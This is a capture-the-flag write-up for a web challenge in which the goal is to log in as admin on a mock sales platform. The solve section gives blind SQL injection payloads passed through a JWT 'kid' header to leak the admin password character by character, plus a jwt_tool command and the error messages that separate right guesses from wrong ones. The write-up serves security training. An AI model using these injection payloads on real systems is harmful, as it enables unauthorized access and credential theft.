# Majestic Sales

## CHALLENGE INFO

You've been tasked with a pentesting engagement on a sales management platform, they've provided you with a mockup build of the website and they've asked you to find a way to login as "admin".

## Challange download and instructions

[web_majestic_sales](web_majestic_sales.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

<details>
<summary>Click this to collapse/fold.</summary>

concept:

```sql
SELECT * FROM app_config WHERE kid = '' UNION SELECT id,kid,tenant,(CASE WHEN((SELECT substr(password, 1, 1) FROM users WHERE username = 'admin')='R') THEN (SELECT secret FROM app_config WHERE kid = '2') ELSE null END) FROM app_config WHERE kid = '2';
```

```bash
python jwt_tool.py -T eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjIifQ.eyJ1c2VybmFtZSI6InRlc3QiLCJ0ZW5hbnQiOiJ1a19vZmZpY2UiLCJpYXQiOjE2MzQ2NzUxNDR9.fRNwkannhk0lLIaR1-RG1qcpD6CsPJ2Ic1Lo77RWr0c
```

```
' UNION SELECT 1,2,3,(CASE WHEN((SELECT substr(password, 1, 1) FROM users WHERE username = 'admin')='R') THEN '2' ELSE '1' END) -- -
```

```
' UNION SELECT id,kid,tenant,(CASE WHEN((SELECT substr(password, 1, 1) FROM users WHERE username = 'admin')='O') THEN (SELECT secret FROM app_config WHERE kid = '2') ELSE null END) FROM app_config WHERE kid = '2
```

**incorrect output**

```
500 Internal Server Error

{"message":"JsonWebTokenError: secret or public key must be provided"}
```

**correct output**

```
500 Internal Server Error

{"message":"JsonWebTokenError: invalid signature"}
```

</details>

## Flag





